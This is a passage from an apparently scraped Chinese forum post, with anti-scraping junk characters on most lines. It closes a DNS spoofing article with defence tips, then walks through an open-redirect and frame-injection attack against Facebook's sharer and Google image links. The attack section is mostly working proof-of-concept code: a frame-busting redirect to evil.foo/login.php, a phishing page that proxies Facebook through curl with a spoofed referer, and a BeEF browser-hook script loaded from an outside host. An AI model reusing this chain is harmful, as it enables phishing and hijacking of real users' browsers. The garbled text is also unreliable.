以上就是一次成功的DNS欺骗: X& Q& G4 }& f2 b4 H: e
DNS欺骗的危害是巨大的,我不说大家也都懂得,常见被利用来钓鱼、挂马之类的
2 Y* @' U; [) Q) x' c" Q , B- l3 E6 R4 q& W. e8 \7 c3 K
" s8 W( q1 T. o3 _, g
0×02.2 DNS欺骗的防范
4 Y! C- M, s- d, e3 t+ D
, G9 Y; U2 k& E1 k5 F0 kDNS欺骗是很难进行有效防御的,因为大多情况下都是被攻击之后才会发现,对于避免DNS欺骗所造成危害,本菜鸟提出以下建议
/ q1 j1 b9 X" l; T9 p* Z+ t1.因为DNS欺骗前提也需要ARP欺骗成功。所以首先做好对ARP欺骗攻击的防范。6 `" t# v9 U5 g7 B, q
2.不要依赖于DNS,尽管这样会很不方便,可以使用hosts文件来实现相同的功能,Hosts文件位置:( e; i4 T2 K8 U( T& w; r2 ^
windows xp/2003/vista/2008/7 系统的HOSTS文件位置 c:\windows\system32\drivers\etc 用记事本打开即可进行修改。
# u+ u8 D. k; u& l+ ^) y3.使用安全检测软件定期检查系统是否遭受攻击
3 f0 U6 [" b+ M* e4.使用DNSSEC,DNSSEC详细介绍:http://baike.baidu.com/view/3421039.htm, x8 \, q4 d& m' f) s
by: TaskKilL* _# b3 I" {: y' _2 q% k
4 l3 a) l$ l! x% |) B9 | rWindows live 翻译框架注入- a. z) _* c, w- S1 W+ T
; @5 J- X. M" w- ~( h ]: x- D* Z7 j
http://www.windowslivetranslator ... evil.foo/bypass.php
0 `& s+ _5 d' Q+ U; c8 D) P, O, ^# v% w6 Z7 J N3 J. I2 A( }
6 R0 B) A/ R. @/ d
# T+ d6 r6 Q$ L3 ?6 _% E
三、重定向描述 :
; e x/ s' [2 j! Y# H$ Z3 \
9 p* W' Y5 V8 u; o# K
0 t4 }0 H! }" e
% m8 L* K' C- j8 [重定向漏洞允许一个邪恶的用户对一个网站重定向给受害者。主要攻击媒介的这种脆弱性是pishing。只有在远程Web服务器的权限可以重定向漏洞使用恶意脚本php,javascript, vbscript ,ajax (worm)。' [, H! H/ r5 ^$ v" p' p0 N
/ r: l7 ~$ ^. e$ n% G& H8 o2 W
最常见的攻击媒介是体现在双重网址中:
% `9 t% `$ n: H" u4 c
. E3 Q" {* W3 n5 }http://site.com/redirect?r=http://malicious_website.com. E& Y' T1 ^( n* r
& z+ R0 H; t6 [
/ s" m, M; S% ~/ C# n6 ^: l2 S5 F% e; Q* \3 q
四、利用方式,结合重定向框架注入vulnz:; \% D" u# j; Y* Q; c
+ r/ ?1 k# ]0 N+ [" M/ K- J# f8 M
1 T2 ?8 A. g- M
( K0 U$ |8 h" z/ E3 I4 V. B# ]4 j
先进的重定向和框架注入组合攻击:: R2 y9 W8 u3 b2 n1 t) }
2 v4 w* x0 l# H/ x- f& @1 `* l- a/-----------/ /-----------/ /-----------/ /-----------/ /-----------/6 i0 I% R5 }: g& |
9 ~% X9 s/ A* {2 L' A
|facebook ---| google ---| bypass.php|---| login.php ---| b e e f :
% n8 [, R g- e% S- y; B. W6 [
0 Y, o5 s4 U& M$ c6 ^/ y\-----------\ \-----------\ \-----------\ \-----------\ \-----------\
2 k, @# h) {) P4 M* w% w6 v2 }0 C# x6 E3 a
Facebook的sharer.php的输入源可能看起来像这样的脚本:: `" n, K) t9 e% C1 Q
8 g0 }& c: R1 v" b#########################################################################
6 i4 E, _$ \" I4 V A
8 v7 @! O3 p# q* ^% Z+ l x<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN"/ s0 e! Z1 P$ v
# L( u3 U2 U% ?; i+ b"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">. ]# s" o" ?3 `# F1 B( {
/ Z# D9 A+ K5 O% t, e0 C+ l
<html xmlns="http://www.w3.org/1999/xhtml">
- A& X) N; {/ t P% p, F$ X( B b# C! {( U* z* o
<html>
/ J' Y% O2 }) V& k4 \% g
9 G1 S$ o% ]( j# T7 V4 N<head>
3 G: x5 M Z9 F$ g5 b1 F
9 y- U7 w$ U# t9 y9 E<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />/ a+ g4 z/ d% @9 ~
% Y5 P* o2 H4 L& f5 R4 W" I
<title> Welcome in my-site-is-not-secure-now.w00t</title>
" c- o0 ]- x" u f' |4 e- l7 m& ?+ K" Z9 h: r8 d; k( R- }
</head>' b; W2 _8 h3 @: @
/ {; P) R! z. |+ t5 Y0 r
<frameset rows="*" cols="110,*" frameborder="NO" border="0" framespacing="0">
* _) s, ~# O! w1 R9 @8 n: K6 E0 T
# L P' M" T1 Q" |* O7 ^9 F0 V) `: b<frame src="navigation.htm" name="navigation" frameborder="yes" scrolling=""NO"2 E9 `. X' K5 v) c9 \/ h
* }$ j: L2 u; B' y+ t3 W( w4 C
bordercolor="#0000CC" id="navigation">/ n# v7 d- [1 C0 t
* J0 A3 Q& R& o/ [<frameset rows="98,*" cols="*" framespacing="0" frameborder="NO" border="0" >
1 n; r1 e+ j; J6 R& {! g6 e8 @: z% I6 |! e9 \7 L) W1 c. a( l$ j
<frame src="en_tete.htm" name="en-tete" frameborder="yes" scrolling="NO"( @* C4 k j* ^" d* W
I. P( W1 ]5 w# q- m7 t" ibordercolor="#000000" id="en-tete">; e K& X! T: O/ | j! V7 ?" c( v
<frame src="<?php
4 j6 {1 J& p# C& I) o3 ?0 o" Z2 r9 X" \/ G9 j! a; N
//secure code8 A" n1 c8 b3 m& W$ D/ O
0 G3 e! Z% S& K7 v6 I: ?
if(isset($_GET['iframe']))
" X' X* l! T! T: F7 P% `" j8 s, M
9 r- J. S4 u. G{
& o. Q1 z( p- U+ s1 R# T- x3 a4 |: v( m2 s8 }
$allowUrls = array("http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php");
! ~% g% p4 f+ n7 l
+ { Y2 U/ B+ pif(in_array($_GET['iframe'], $allowUrls))% s* ]. ?# ~8 M- R1 r' s6 c; g
8 w0 D+ k1 l7 ?: W. Uecho $_GET['iframe']; // 如果IFRAME中允许有一个网址7 }% W0 Y4 ^* v5 A( f% n" `
1 M& `3 T: x( t8 V/ @% ]else // 为了显示主页(或一个错误页面)( h( I- {( Z* z0 t9 R
6 V# L% ]- K, y0 O5 ~
echo "accueil.htm";
9 H/ g6 ?6 V" h, [
' m% _" D0 B5 W, `: u8 C5 K} J' e+ e8 E( s; h- W! J
4 f* X3 _1 B5 v
else // !!!
) _5 C6 q8 Y1 l. w/ l2 X
- @, r3 G9 E5 O, Gecho "accueil.htm";
9 X3 T2 x" N7 V* \ u& s" j
- m# S1 g+ V1 d4 P?>" name="corps" scrolling="auto" id="corps">: w3 R. M5 S0 n
( K5 {2 p& b# A8 s5 }& {) Q% I9 }! a) {
</frameset>* ]- L, Q8 f1 J, z2 j. l- g& w
5 d) L V6 t v0 {) g: Y" t7 L</frameset><noframes>No frames </noframes>* l4 y6 R, p. V, Y7 e( i
& _4 n9 y: A8 L) \</html>
$ Q6 }5 }; y+ z. `' L4 E
/ [7 n9 ~& d6 X#########################################################################
' s/ K: E$ J& {
# @4 E+ A; Q2 o3 y. c在Facebook中变换恶意网址链接像这样(sharer.php script):
, j% u$ M4 ]3 ^% ~# p5 r( d5 z, J& k) S4 @# u* |" u) h
http://www.facebook.com/ext/shar ... p;h=Crew&u=p3lo
2 N/ ^$ |: G1 x+ ]6 L
% E- z- o/ o+ f( R* Y" b和上面的链接Facebook的概况出现像这样:6 F8 e1 _9 U' W! Z0 i# r1 T9 Q
/ X" v: L- Y+ n4 w: Y/ c1 J8 T&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&) T# h7 J# y, I2 H0 V8 ~+ m
1 J3 y* B' z* P" E ~图片搜索结果
. M5 [/ w1 m3 W/ T7 B) m3 Y. Q& w
2 A+ w& @# E% e/ d8 Hhttp://www.google.fr/imgres?imgurl=http://fake_url...
) T/ O W8 ?9 q, k" ]
/ D- y# F" u' @3 c" e" s&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
3 S* f% ]4 |9 g8 c" {. x- k. \. f5 X% f$ Q, \- A$ ^ Q
现在来看看我的成批输出转换程序(PoC)重定向脚本(bypass.php):# J3 ~" w9 E9 ~' r) e- M! Z* v7 V# r
" ] t6 f; X! J5 S###########################################################################/ x0 m. L1 W& u* J* F" A1 `+ @5 Q
) g3 Y5 V5 F- ?7 z! n: C
<head>
- E5 G/ o0 z- ]1 Z5 D& s) q6 ?8 t, O/ E
<meta http-equiv="Content-Language" content="it">7 b9 X. b x. e! b# }! n
P( F, I+ W3 v: d/ i& m9 I: `
<SCRIPT LANGUAGE="JavaScript">+ Z, J8 u+ g( U1 V$ v9 n
' y# g4 v: b4 T1 W* Aif (top.frames.length!=0) top.location=self.document.location;
# c: k" \! u0 Y F. T" v; V1 d; d' ~7 p
</SCRIPT>1 N$ u8 V9 g6 h- m
) a3 @5 z1 V! ?. y/ A
<title>fb redirector PoC by Czy</title>! Q* a) T! J" ?# B$ s' f2 P9 s
( \ B! @! @# P
</head>) l, n& A+ g! w1 J/ _. @
* G( `: H+ A6 \' l+ g4 |# L5 l) R<body bgcolor="#99FF66">2 [& K7 q# }, F& ~ S
" @8 d) S! N( M. f- p- ~# o
第一个脚本包含在head,允许杀死第一个框架的有效载荷,URL重定向到self.document.location。% M' e- c5 N% ^# Q. [% s& @+ _
第二个脚本允许重定向我的网页上,以先进的pishing页面。
+ k. H8 @4 L6 ?
! _! U7 ~2 A7 J5 U<br>
# @! [0 N9 E: P2 s
- b& X8 ?& l7 s6 }/ N<br><br>- y5 X4 F+ V# }3 x% F
6 v$ x% i* q: x5 I+ C) U) D2 r
</body>. a! r! f1 o! T- F7 q; @2 K0 p
) a, `- ?& { p- `2 ^
<br><br><script>document.location="http://evil.foo/login.php";</script><br>% G& e: K% \) m, n
' t+ Y$ I! H& e
###############################################################################
) ?- R1 K. n, \" n( i. w* t9 G1 `7 W7 x" h2 X0 O' v
这是先进重定向pishing页面的来源 (login.php):
# l3 D M$ ^( J' s$ R7 c e" c {4 K% q9 S
###############################################################################, L! t/ ~; x+ }( g6 ~
0 v" K6 H* f- t- y" t/ o
<?php2 Z% Y l" u. D7 k4 ~7 L
3 Q+ e5 U! j" a( L# R
//by Czy2 i( L5 r4 G+ ]/ S. J# ~0 g
, M; ^( J: A% h* P3 [$referer=”http://www.facebook.com/”;
# _/ @+ D' q- n) c, `% |' s* N- Y4 a1 l2 ]: J
// spoofing FireFox 2.07 T) s+ y% H* U6 r1 Z
6 U6 d) |# H9 H$useragent=”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1?;
6 k7 r. w) c1 C4 w+ n! S! T; f3 J% R- g) Y! j
$ch = curl_init();
8 [0 Z& t' g# o: g8 q5 R. N% n7 H. n2 s$ P- u2 c+ F5 Y
curl_setopt ($ch, CURLOPT_URL, "http://www.facebook.com/");' q' c7 @/ J y. v; `) S; |/ k
5 b+ W. I+ |6 Z$ }- t9 m7 @curl_setopt ($ch, CURLOPT_HEADER, 0);! w& a! c6 N/ O0 E
9 I+ `, t' r/ Q5 X
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
' _6 M! r0 Z: w- G& t
' V# X! N( w* E. z+ Dcurl_setopt($ch, CURLOPT_REFERER, $referer);
( k9 k' i( M9 N) j! a0 c) Z1 Q
: X# G2 g4 Y) L) x4 ocurl_exec ($ch);/ S h2 j1 w+ _; |* H4 K4 _( L
7 g# Q5 I6 l- j/ s- x- xcurl_close ($ch);5 T- H7 u0 t- i" G: V
3 z, ~" ~/ a$ D. |
?>
. B0 H) C2 X8 }, l" P5 `* F& r+ [7 Y; I3 B) Y( }0 t
<script src=”http://beefsite/beef/hook/beefmagic.js.php”></script>) J& y$ P4 [6 ]- o& `+ t
" `' H: L2 `# H0 B$ x! B
###############################################################################
' K5 f8 C* I% j! Y* ~0 Y7 a8 S$ L6 P" U( G) v+ ?
五、尾声:
* I: T. Q1 ?5 _- H7 j/ i9 Y& ?& J! h8 y6 m( S: g, M, D
经过长期时刻的研究,个人认为最好的方式来纠正这些漏洞是保证用户离开该网页和网站域名的重定向页面。
y% m% ]6 e+ c3 o |